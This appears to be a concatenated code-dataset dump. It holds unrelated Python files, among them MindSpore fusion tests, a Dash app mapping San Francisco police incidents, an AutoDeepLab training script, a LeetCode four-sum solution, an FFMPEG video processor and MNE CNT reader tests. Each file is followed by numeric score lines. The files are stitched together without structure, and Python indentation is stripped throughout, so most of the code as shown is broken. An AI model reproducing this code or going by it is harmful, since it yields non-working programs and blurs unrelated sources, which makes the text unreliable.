print(env.action_space.shape)
print(env.action_space.n)
# for _ in range(20):
# action=env.action_space.sample()
# print(action)
# env.step(action)
#
# state = env.reset()
# print(state.shape)
# img = state[0][0]
# plt.imshow(img, cmap='gray')
# plt.show()
| 2.328125 | 2 |
bucket_4C/python-Pillow/patches/patch-setup.py | jrmarino/ravensource | 17 | 7886 | <reponame>jrmarino/ravensource
--- setup.py.orig 2019-07-02 19:13:39 UTC
+++ setup.py
@@ -465,9 +465,7 @@ class pil_build_ext(build_ext):
_add_directory(include_dirs, "/usr/X11/include")
elif (
- sys.platform.startswith("linux")
- or sys.platform.startswith("gnu")
- or sys.platform.startswith("freebsd")
+ sys.platform.startswith("nothing")
):
for dirname in _find_library_dirs_ldconfig():
_add_directory(library_dirs, dirname)
| 1.382813 | 1 |
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py | GeekHee/mindspore | 0 | 7887 | <reponame>GeekHee/mindspore
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore.ops import Primitive
from mindspore.ops import operations as P
from mindspore.ops.operations import _grad_ops as G
from mindspore.ops import _constants as Constants
# pylint: disable=unused-variable
tuple_getitem = Primitive(Constants.kTupleGetItem)
add = P.Add()
allreduce = P.AllReduce()
allreduce.add_prim_attr('fusion', 1)
make_tuple = Primitive("make_tuple")
conv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode="valid", pad=0, stride=1, dilation=1, group=1)
bn = P.FusedBatchNorm()
relu = P.ReLU()
conv_bn1 = Primitive('ConvBN1')
bn2_add_relu = Primitive('BN2AddRelu')
bn2_relu = Primitive('BN2Relu')
fused_bn1 = Primitive('FusedBN1')
fused_bn2 = Primitive('FusedBN2')
fused_bn3 = Primitive('FusedBN3')
bn_grad = G.FusedBatchNormGrad()
bn_grad1 = Primitive('BNGrad1')
bn_grad2 = Primitive('BNGrad2')
bn_grad3 = Primitive('BNGrad3')
class FnDict:
def __init__(self):
self.fnDict = {}
def __call__(self, fn):
self.fnDict[fn.__name__] = fn
def __getitem__(self, name):
return self.fnDict[name]
def test_bn_split(tag):
""" test_split_bn_fusion """
fns = FnDict()
@fns
def before(x, scale, b, mean, variance):
bn_output = bn(x, scale, b, mean, variance)
item0 = tuple_getitem(bn_output, 0)
return item0
@fns
def after(x, scale, b, mean, variance):
fused_bn1_output = fused_bn1(x)
fused_bn2_input0 = tuple_getitem(fused_bn1_output, 0)
fused_bn2_input1 = tuple_getitem(fused_bn1_output, 1)
fused_bn2_output = fused_bn2(fused_bn2_input0, fused_bn2_input1, mean, variance)
fused_bn3_input1 = tuple_getitem(fused_bn2_output, 0)
fused_bn3_input2 = tuple_getitem(fused_bn2_output, 1)
fused_bn3_output = fused_bn3(x, fused_bn3_input1, fused_bn3_input2, scale, b)
output1 = tuple_getitem(fused_bn2_output, 2)
output2 = tuple_getitem(fused_bn2_output, 3)
output3 = tuple_getitem(fused_bn2_output, 0)
output4 = tuple_getitem(fused_bn2_output, 1)
output = make_tuple(fused_bn3_output, output1, output2, output3, output4)
item0 = tuple_getitem(output, 0)
return make_tuple(item0)
return fns[tag]
def test_bn_grad_split(tag):
""" test_bn_grad_split """
fns = FnDict()
@fns
def before(dy, x, scale, save_mean, save_inv_variance):
bn_grad_output = bn_grad(dy, x, scale, save_mean, save_inv_variance)
item0 = tuple_getitem(bn_grad_output, 0)
item1 = tuple_getitem(bn_grad_output, 1)
item2 = tuple_getitem(bn_grad_output, 2)
output = make_tuple(item0, item1, item2)
res = tuple_getitem(output, 0)
return res
@fns
def after(i0, i1, i2, i3, i4):
bn_grad1_output = bn_grad1(i0, i1, i3)
bn_grad1_item0 = tuple_getitem(bn_grad1_output, 0)
bn_grad1_item1 = tuple_getitem(bn_grad1_output, 1)
bn_grad1_item2 = tuple_getitem(bn_grad1_output, 2)
bn_grad2_output = bn_grad2(bn_grad1_item0, bn_grad1_item1, i4, i2)
bn_grad2_item0 = tuple_getitem(bn_grad2_output, 0)
bn_grad2_item1 = tuple_getitem(bn_grad2_output, 1)
bn_grad2_item2 = tuple_getitem(bn_grad2_output, 2)
bn_grad2_item3 = tuple_getitem(bn_grad2_output, 3)
bn_grad2_item4 = tuple_getitem(bn_grad2_output, 4)
bn_grad3_output = bn_grad3(i0, bn_grad2_item2, bn_grad2_item3, bn_grad2_item4, bn_grad1_item2)
bn_grad_make_tuple = make_tuple(bn_grad3_output, bn_grad2_item0, bn_grad2_item1)
item0 = tuple_getitem(bn_grad_make_tuple, 0)
item1 = tuple_getitem(bn_grad_make_tuple, 1)
item2 = tuple_getitem(bn_grad_make_tuple, 2)
output = make_tuple(item0, item1, item2)
return make_tuple(tuple_getitem(output, 0))
return fns[tag]
def test_all_reduce_fusion_all(tag):
""" test_all_reduce_fusion_all """
fns = FnDict()
@fns
def before(x1, x2, x3, x4, x5):
y1 = allreduce(x1)
y2 = allreduce(x2)
y3 = allreduce(x3)
y4 = allreduce(x4)
y5 = allreduce(x5)
return make_tuple(y1, y2, y3, y4, y5)
@fns
def after(x1, x2, x3, x4, x5):
ar = allreduce(x5, x4, x3, x2, x1)
y5 = tuple_getitem(ar, 0)
y4 = tuple_getitem(ar, 1)
y3 = tuple_getitem(ar, 2)
y2 = tuple_getitem(ar, 3)
y1 = tuple_getitem(ar, 4)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
@fns
def after1(x1, x2, x3, x4, x5):
ar = allreduce(x1, x2, x3, x4, x5)
y1 = tuple_getitem(ar, 0)
y2 = tuple_getitem(ar, 1)
y3 = tuple_getitem(ar, 2)
y4 = tuple_getitem(ar, 3)
y5 = tuple_getitem(ar, 4)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
return fns[tag]
def test_all_reduce_fusion_group(tag):
""" test_all_reduce_fusion_group """
fns = FnDict()
@fns
def before(x1, x2, x3, x4, x5):
y1 = allreduce(x1)
y2 = allreduce(x2)
y3 = allreduce(x3)
y4 = allreduce(x4)
y5 = allreduce(x5)
return make_tuple(y1, y2, y3, y4, y5)
@fns
def after1(x1, x2, x3, x4, x5):
ar1 = allreduce(x5, x4)
ar2 = allreduce(x3, x2, x1)
y4 = tuple_getitem(ar1, 1)
y5 = tuple_getitem(ar1, 0)
y1 = tuple_getitem(ar2, 2)
y2 = tuple_getitem(ar2, 1)
y3 = tuple_getitem(ar2, 0)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
@fns
def after2(x1, x2, x3, x4, x5):
ar1 = allreduce(x1, x3, x5)
ar2 = allreduce(x2, x4)
y1 = tuple_getitem(ar1, 2)
y3 = tuple_getitem(ar1, 1)
y5 = tuple_getitem(ar1, 0)
y2 = tuple_getitem(ar2, 1)
y4 = tuple_getitem(ar2, 0)
output = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(output)
return fns[tag]
| 1.703125 | 2 |
tdx/abc.py | TrainerDex/DiscordBot | 2 | 7888 | <reponame>TrainerDex/DiscordBot
from abc import ABC
from typing import Dict
from redbot.core import Config
from redbot.core.bot import Red
from trainerdex.client import Client
class MixinMeta(ABC):
"""
Base class for well behaved type hint detection with composite class.
Basically, to keep developers sane when not all attributes are defined in each mixin.
"""
def __init__(self, *_args):
self.bot: Red
self.config: Config
self.client: Client
self.emoji: Dict
| 2.546875 | 3 |
app.py | PolinaRomanchenko/Victorious_Secret_DSCI_532 | 0 | 7889 | import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import pandas as pd
import numpy as np
import altair as alt
import vega_datasets
alt.data_transformers.enable('default')
alt.data_transformers.disable_max_rows()
app = dash.Dash(__name__, assets_folder='assets', external_stylesheets=[dbc.themes.BOOTSTRAP])
# Boostrap CSS.
app.css.append_css({'external_url': 'https://codepen.io/amyoshino/pen/jzXypZ.css'}) # noqa: E501
server = app.server
app.title = 'Dash app with pure Altair HTML'
df = pd.read_csv('data/Police_Department_Incidents_-_Previous_Year__2016_.csv')
# df = pd.read_csv("https://raw.github.ubc.ca/MDS-2019-20/DSCI_531_lab4_anas017/master/data/Police_Department_Incidents_-_Previous_Year__2016_.csv?token=<PASSWORD>%3D")
df['datetime'] = pd.to_datetime(df[["Date","Time"]].apply(lambda x: x[0].split()[0] +" "+x[1], axis=1), format="%m/%d/%Y %H:%M")
df['hour'] = df['datetime'].dt.hour
df.dropna(inplace=True)
top_4_crimes = df['Category'].value_counts()[:6].index.to_list()
top_4_crimes
top_4_crimes.remove("NON-CRIMINAL")
top_4_crimes.remove("OTHER OFFENSES")
# top 4 crimes df subset
df_t4 = df[df["Category"].isin(top_4_crimes)].copy()
def make_plot_top(df_new=df_t4):
# Create a plot of the Displacement and the Horsepower of the cars dataset
# making the slider
slider = alt.binding_range(min = 0, max = 23, step = 1)
select_hour = alt.selection_single(name='select', fields = ['hour'],
bind = slider, init={'hour': 0})
#begin of my code
# typeDict = {'ASSAULT':'quantitative',
# 'VANDALISM':'quantitative',
# 'LARCENY/THEFT':'quantitative',
# 'VEHICLE THEFT':'quantitative'
# }
# end
chart = alt.Chart(df_new).mark_bar(size=30).encode(
x=alt.X('Category',type='nominal', title='Category'),
y=alt.Y('count()', title = "Count" , scale = alt.Scale(domain = (0,3300))),
tooltip='count()'
).properties(
title = "Per hour crime occurrences for the top 4 crimes",
width=500,
height = 315
).add_selection(
select_hour
).transform_filter(
select_hour
)
return chart
def make_plot_bot(data=df_t4):
chart_1 = alt.Chart(data).mark_circle(size=3, opacity = 0.8).encode(
longitude='X:Q',
latitude='Y:Q',
color = alt.Color('PdDistrict:N', legend = alt.Legend(title = "District")),
tooltip = 'PdDistrict'
).project(
type='albersUsa'
).properties(
width=450,
height=350
)
chart_2 = alt.Chart(data).mark_bar().encode(
x=alt.X('PdDistrict:N', axis=None, title="District"),
y=alt.Y('count()', title="Count of reports"),
color=alt.Color('PdDistrict:N', legend=alt.Legend(title="District")),
tooltip=['PdDistrict', 'count()']
).properties(
width=450,
height=350
)
# A dropdown filter
crimes_dropdown = alt.binding_select(options=list(data['Category'].unique()))
crimes_select = alt.selection_single(fields=['Category'], bind=crimes_dropdown,
name="Pick\ Crime")
combine_chart = (chart_2 | chart_1)
filter_crimes = combine_chart.add_selection(
crimes_select
).transform_filter(
crimes_select
)
return filter_crimes
body = dbc.Container(
[
dbc.Row(
[
dbc.Col(
[
html.H2("San Francisco Crime"),
html.P(
"""\
When looking for a place to live or visit, one important factor that people will consider
is the safety of the neighborhood. Searching that information district
by district could be time consuming and exhausting. It is even more difficult to
compare specific crime statistics across districts such as the crime rate
at a certain time of day. It would be useful if people can look up crime
related information across district on one application. Our app
aims to help people make decisions when considering their next trip or move to San Francisco, California
via visually exploring a dataset of crime statistics. The app provides an overview of the crime rate across
neighborhoods and allows users to focus on more specific information through
filtering of geological location, crime rate, crime type or time of the
crime.
Use the box below to choose crimes of interest.
"""
),
dcc.Dropdown(
id = 'drop_selection_crime',
options=[{'label': i, 'value': i} for i in df_t4['Category'].unique()
],
style={'height': '20px',
'width': '400px'},
value=df_t4['Category'].unique(),
multi=True)
],
md=5,
),
dbc.Col(
[
dbc.Row(
[
html.Iframe(
sandbox = "allow-scripts",
id = "plot_top",
height = "500",
width = "650",
style = {"border-width": "0px"},
srcDoc = make_plot_top().to_html()
)
]
)
]
),
]
),
dbc.Row(
html.Iframe(
sandbox='allow-scripts',
id='plot_bot',
height='500',
width='1200',
style={'border-width': '0px'},
srcDoc= make_plot_bot().to_html()
)
)
],
className="mt-4",
)
app.layout = html.Div(body)
@app.callback([dash.dependencies.Output('plot_top', 'srcDoc'),
dash.dependencies.Output('plot_bot', 'srcDoc')],
[dash.dependencies.Input('drop_selection_crime', 'value')]
)
def update_df(chosen):
new_df = df_t4[(df_t4["Category"].isin(chosen))]
updated_plot_top = make_plot_top(new_df).to_html()
updated_plot_bottom = make_plot_bot(new_df).to_html()
return updated_plot_top, updated_plot_bottom
if __name__ == '__main__':
app.run_server(debug=False) | 2.4375 | 2 |
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py | johnson880319/Software | 0 | 7890 | <reponame>johnson880319/Software
# coding=utf-8
from .subspaces import *
| 0.898438 | 1 |
detection/contor.py | chika626/chainer_rep | 0 | 7891 | <reponame>chika626/chainer_rep
import json
import math
from PIL import Image,ImageDraw
import pandas as pd
import glob
import argparse
import copy
import numpy as np
import matplotlib.pyplot as plt
import pickle
import cv2
from PIL import ImageEnhance
import chainer
from chainer.datasets import ConcatenatedDataset
from chainer.datasets import TransformDataset
from chainer.optimizer_hooks import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.datasets import voc_bbox_label_names
from chainercv.datasets import VOCBboxDataset
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD300
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.utils import read_image
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
import queue
def run(img):
# c , H , W = img.shape
H,W = img.size
img = np.asarray(img)
# 変換後データ配列
transed = Image.new('RGB',(H,W))
for x in range(H):
for y in range(W):
transed.putpixel((x,y),(255,255,255))
for x in range(H):
for y in range(W):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y][x+1][0]:
transed.putpixel((x,y),(0,0,0))
for y in range(W):
for x in range(H):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y+1][x][0]:
transed.putpixel((x,y),(0,0,0))
return transed
def main():
# # 単一の場合のコード
# img = Image.open('cont/transed/X.jpg')
# img=img.convert('L')
# img=np.asarray(img)
# ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)
# img=Image.fromarray(img)
# img=img.convert('RGB')
# transed = run(img)
# transed.save('transec_0.png')
# return
# 大量変換機
img_path=glob.glob("cont/crop/*")
counter=0
for path in img_path:
img = Image.open(path)
transed = run(img)
transed.save('transec_{}.png'.format(counter))
counter+=1
if __name__ == '__main__':
main() | 2.140625 | 2 |
train.py | hjl-yul154/autodeeplab | 1 | 7892 | import os
import pdb
import warnings
import numpy as np
import torch
import torch.nn as nn
import torch.utils.data
import torch.backends.cudnn
import torch.optim as optim
import dataloaders
from utils.utils import AverageMeter
from utils.loss import build_criterion
from utils.metrics import Evaluator
from utils.step_lr_scheduler import Iter_LR_Scheduler
from retrain_model.build_autodeeplab import Retrain_Autodeeplab
from config_utils.re_train_autodeeplab import obtain_retrain_autodeeplab_args
def main():
warnings.filterwarnings('ignore')
assert torch.cuda.is_available()
torch.backends.cudnn.benchmark = True
args = obtain_retrain_autodeeplab_args()
save_dir = os.path.join('./data/', args.save_path)
if not os.path.isdir(save_dir):
os.mkdir(save_dir)
model_fname = os.path.join(save_dir,
'deeplab_{0}_{1}_v3_{2}_epoch%d.pth'.format(args.backbone, args.dataset, args.exp))
record_name = os.path.join(save_dir, 'training_record.txt')
if args.dataset == 'pascal':
raise NotImplementedError
elif args.dataset == 'cityscapes':
kwargs = {'num_workers': args.workers, 'pin_memory': True, 'drop_last': True}
dataset_loader, num_classes, val_loader = dataloaders.make_data_loader(args, **kwargs)
args.num_classes = num_classes
else:
raise ValueError('Unknown dataset: {}'.format(args.dataset))
if args.backbone == 'autodeeplab':
model = Retrain_Autodeeplab(args)
else:
raise ValueError('Unknown backbone: {}'.format(args.backbone))
if args.criterion == 'Ohem':
args.thresh = 0.7
args.crop_size = [args.crop_size, args.crop_size] if isinstance(args.crop_size, int) else args.crop_size
args.n_min = int((args.batch_size / len(args.gpu) * args.crop_size[0] * args.crop_size[1]) // 16)
criterion = build_criterion(args)
model = nn.DataParallel(model).cuda()
model.train()
if args.freeze_bn:
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
m.weight.requires_grad = False
m.bias.requires_grad = False
optimizer = optim.SGD(model.module.parameters(), lr=args.base_lr, momentum=0.9, weight_decay=0.0001)
max_iteration = len(dataset_loader) * args.epochs
scheduler = Iter_LR_Scheduler(args, max_iteration, len(dataset_loader))
start_epoch = 0
evaluator=Evaluator(num_classes)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {0}'.format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print('=> loaded checkpoint {0} (epoch {1})'.format(args.resume, checkpoint['epoch']))
else:
raise ValueError('=> no checkpoint found at {0}'.format(args.resume))
for epoch in range(start_epoch, args.epochs):
losses = AverageMeter()
print('Training epoch {}'.format(epoch))
model.train()
for i, sample in enumerate(dataset_loader):
cur_iter = epoch * len(dataset_loader) + i
scheduler(optimizer, cur_iter)
inputs = sample['image'].cuda()
target = sample['label'].cuda()
outputs = model(inputs)
loss = criterion(outputs, target)
if np.isnan(loss.item()) or np.isinf(loss.item()):
pdb.set_trace()
losses.update(loss.item(), args.batch_size)
loss.backward()
optimizer.step()
optimizer.zero_grad()
if (i + 1) % 200 == 0:
print('epoch: {0}\t''iter: {1}/{2}\t''lr: {3:.6f}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format(
epoch + 1, i + 1, len(dataset_loader), scheduler.get_lr(optimizer), loss=losses))
if epoch < args.epochs:
if (epoch+1) % 5 == 0:
torch.save({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, model_fname % (epoch + 1))
else:
torch.save({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict(),
}, model_fname % (epoch + 1))
line0 = 'epoch: {0}\t''loss: {loss.val:.4f} ({loss.ema:.4f})'.format(
epoch, loss=losses)
with open(record_name, 'a') as f:
f.write(line0)
if line0[-1] != '\n':
f.write('\n')
if epoch%3!=0 and epoch <args.epochs-20:
continue
print('Validate epoch {}'.format(epoch))
model.eval()
evaluator.reset()
test_loss=0.0
for i,sample in enumerate(val_loader):
inputs = sample['image'].cuda()
target = sample['label'].cuda()
with torch.no_grad():
outputs = model(inputs)
# loss = criterion(outputs, target)
# test_loss+=loss.item()
pred=outputs.data.cpu().numpy()
target=target.cpu().numpy()
pred = np.argmax(pred, axis=1)
evaluator.add_batch(target,pred)
Acc = evaluator.Pixel_Accuracy()
Acc_class = evaluator.Pixel_Accuracy_Class()
mIoU = evaluator.Mean_Intersection_over_Union()
FWIoU = evaluator.Frequency_Weighted_Intersection_over_Union()
print("epoch: {}\t Acc:{:.3f}, Acc_class:{:.3f}, mIoU:{:.3f}, fwIoU: {:.3f}".format(epoch,Acc, Acc_class, mIoU, FWIoU))
line1='epoch: {}\t''mIoU: {:.3f}'.format(epoch,mIoU)
with open(record_name, 'a') as f:
f.write(line1)
if line1[-1] != '\n':
f.write('\n')
if __name__ == "__main__":
main()
| 2 | 2 |
test.py | xxaxdxcxx/miscellaneous-code | 0 | 7893 | class Solution:
# dictionary keys are tuples, storing results
# structure of the tuple:
# (level, prev_sum, val_to_include)
# value is number of successful tuples
def fourSumCount(self, A, B, C, D, prev_sum=0, level=0, sums={}):
"""
:type A: List[int]
:type B: List[int]
:type C: List[int]
:type D: List[int]
:rtype: int
"""
# handle clearing dictionary between tests
sums = {} if level == 3 else sums
# base case:
if level == 3:
total = 0
for num in D:
if prev_sum + num == 0:
print("At level 3, 0 total found using entry w/ value {0}".
format(num))
total += 1
return total
total = 0
lists = [A, B, C]
for num in lists[level]:
if level == 0:
print(str(sums))
if (level, prev_sum, num) in sums:
total += sums[(level, prev_sum, num)]
print("Used dictionary entry {0}, making total {1}".
format((level, prev_sum, num), total))
else:
print("Call from level {0} to level {1}; current sum is {2}".
format(level, level + 1, prev_sum + num))
result = self.fourSumCount(A, B, C, D, prev_sum + num,
level + 1, sums)
sums[(level, prev_sum, num)] = result
total += result
if level == 0:
sums = {}
print(sums)
return total
sol = Solution()
A = [1]
B = [-1]
C = [0]
D = [1]
result = sol.fourSumCount(A, B, C, D)
print("Test 1: {0}".format(result))
A = [1, 2]
B = [-2, -1]
C = [-1, 2]
D = [0, 2]
result = sol.fourSumCount(A, B, C, D)
print("Test 2: {0}".format(result))
| 3.46875 | 3 |
src/boot.py | johngtrs/krux | 0 | 7894 | # The MIT License (MIT)
# Copyright (c) 2021 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import machine
from pmu import axp192
from context import Context
from login import Login
from home import Home
import settings
pmu = axp192()
# Enable power management so that if power button is held down 6 secs,
# it shuts off as expected
pmu.enablePMICSleepMode(True)
ctx = Context()
ctx.display.flash_text(settings.load('splash', ( 'Krux' ), strip=False))
while True:
if not Login(ctx).run():
break
if not Home(ctx).run():
break
ctx.display.flash_text(( 'Shutting down..' ))
ctx.clear()
pmu.setEnterSleepMode()
machine.reset()
| 2.15625 | 2 |
smartfields/processors/video.py | suhaibroomy/django-smartfields | 0 | 7895 | <reponame>suhaibroomy/django-smartfields<filename>smartfields/processors/video.py
import re
import six
from smartfields.processors.base import ExternalFileProcessor
from smartfields.utils import ProcessingError
__all__ = [
'FFMPEGProcessor'
]
class FFMPEGProcessor(ExternalFileProcessor):
duration_re = re.compile(r'Duration: (?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
progress_re = re.compile(r'time=(?P<hours>\d+):(?P<minutes>\d+):(?P<seconds>\d+)')
error_re = re.compile(r'Invalid data found when processing input')
cmd_template = "ffmpeg -i {input} -y -codec:v {vcodec} -b:v {vbitrate} " \
"-maxrate {maxrate} -bufsize {bufsize} -vf " \
"scale={width}:{height} -threads {threads} -c:a {acodec} {output}"
def stdout_handler(self, line, duration=None):
if duration is None:
duration_time = self.duration_re.search(line)
if duration_time:
duration = self.timedict_to_seconds(duration_time.groupdict())
elif duration != 0:
current_time = self.progress_re.search(line)
if current_time:
seconds = self.timedict_to_seconds(current_time.groupdict())
progress = float(seconds)/duration
progress = progress if progress < 1 else 0.99
self.set_progress(progress)
elif self.error_re.search(line):
raise ProcessingError("Invalid video file or unknown video format.")
return (duration,)
def timedict_to_seconds(self, timedict):
seconds = 0
for key, t in six.iteritems(timedict):
if key == 'seconds':
seconds+= int(t)
elif key == 'minutes':
seconds+= int(t)*60
elif key == 'hours':
seconds+= int(t)*3600
return seconds
| 2.453125 | 2 |
tests/test_vmtkScripts/test_vmtksurfaceconnectivity.py | ramtingh/vmtk | 0 | 7896 | ## Program: VMTK
## Language: Python
## Date: January 12, 2018
## Version: 1.4
## Copyright (c) <NAME>, <NAME>, All rights reserved.
## See LICENSE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
## Note: this code was contributed by
## <NAME> (Github @rlizzo)
## University at Buffalo
import pytest
import vmtk.vmtksurfaceconnectivity as connectivity
import os
@pytest.fixture(scope='module')
def aorta_surface_two_segments(input_datadir):
import vmtk.vmtksurfacereader as surfacereader
reader = surfacereader.vmtkSurfaceReader()
reader.InputFileName = os.path.join(input_datadir, 'aorta-surface-two-segments.vtp')
reader.Execute()
return reader.Surface
def test_extract_largest_surface(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_largest_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'largest'
connectiv.CleanOutput = 1
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_reference_surface(aorta_surface_two_segments, aorta_surface_reference, compare_surfaces):
name = __name__ + '_test_extract_closest_to_reference_surface.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ReferenceSurface = aorta_surface_reference
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
def test_extract_closest_to_point(aorta_surface_two_segments, compare_surfaces):
name = __name__ + '_test_extract_closest_to_point.vtp'
connectiv = connectivity.vmtkSurfaceConnectivity()
connectiv.Surface = aorta_surface_two_segments
connectiv.Method = 'closest'
connectiv.ClosestPoint = [0.0, 0.0, 0.0]
connectiv.Execute()
assert compare_surfaces(connectiv.Surface, name) == True
| 2.265625 | 2 |
sssoon/forms.py | Kingpin-Apps/django-sssoon | 2 | 7897 | <gh_stars>1-10
from django import forms
from nocaptcha_recaptcha.fields import NoReCaptchaField
class NewsletterForm(forms.Form):
email = forms.EmailField(label='Email', required=True,
widget=forms.TextInput(attrs={
'id': 'newsletter-email',
'type': 'email',
'title': 'Email',
'name': 'email',
'class': 'form-control transparent',
'placeholder': '<EMAIL>'
}))
captcha = NoReCaptchaField() | 2.375 | 2 |
simple_run_menu.py | william01110111/simple_run_menu | 0 | 7898 | <reponame>william01110111/simple_run_menu
#! /bin/python3
# simple run menu
import os
import stat
def is_file_executable(path):
executable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH
if not os.path.isfile(path):
return False
st = os.stat(path)
mode = st.st_mode
if not mode & executable:
return False
return True
def get_files_in_dir(directory):
if directory == '':
directory = '.'
if directory[-1] != '/':
directory += '/'
return [directory + i for i in os.listdir(directory)]
def command_to_name(command):
filename_with_ext = os.path.basename(command)
filename = filename_with_ext.rsplit('.', 1)[0]
name = filename.replace('_', ' ')
capitalized = ' '.join([i[0].upper() + i[1:] for i in name.split()])
return capitalized
class Option:
options = {}
@staticmethod
def add(command):
options['a'] = Option(command, command, 'a')
def __init__(self, name, command, trigger):
self.name = name
self.command = command
self.trigger = trigger
if __name__ == "__main__":
print([command_to_name(i) for i in get_files_in_dir('') if is_file_executable(i)])
| 2.90625 | 3 |
mne/io/cnt/tests/test_cnt.py | stevemats/mne-python | 1,953 | 7899 |
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD-3-Clause
import os.path as op
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from mne import pick_types
from mne.datasets import testing
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.cnt import read_raw_cnt
from mne.annotations import read_annotations
data_path = testing.data_path(download=False)
fname = op.join(data_path, 'CNT', 'scan41_short.cnt')
@testing.requires_testing_data
def test_data():
"""Test reading raw cnt files."""
with pytest.warns(RuntimeWarning, match='number of bytes'):
raw = _test_raw_reader(read_raw_cnt, input_fname=fname,
eog='auto', misc=['NA1', 'LEFT_EAR'])
# make sure we use annotations event if we synthesized stim
assert len(raw.annotations) == 6
eog_chs = pick_types(raw.info, eog=True, exclude=[])
assert len(eog_chs) == 2 # test eog='auto'
assert raw.info['bads'] == ['LEFT_EAR', 'VEOGR'] # test bads
# the data has "05/10/200 17:35:31" so it is set to None
assert raw.info['meas_date'] is None
@testing.requires_testing_data
def test_compare_events_and_annotations():
"""Test comparing annotations and events."""
with pytest.warns(RuntimeWarning, match='Could not parse meas date'):
raw = read_raw_cnt(fname)
events = np.array([[333, 0, 7],
[1010, 0, 7],
[1664, 0, 109],
[2324, 0, 7],
[2984, 0, 109]])
annot = read_annotations(fname)
assert len(annot) == 6
assert_array_equal(annot.onset[:-1], events[:, 0] / raw.info['sfreq'])
assert 'STI 014' not in raw.info['ch_names']
| 2.125 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.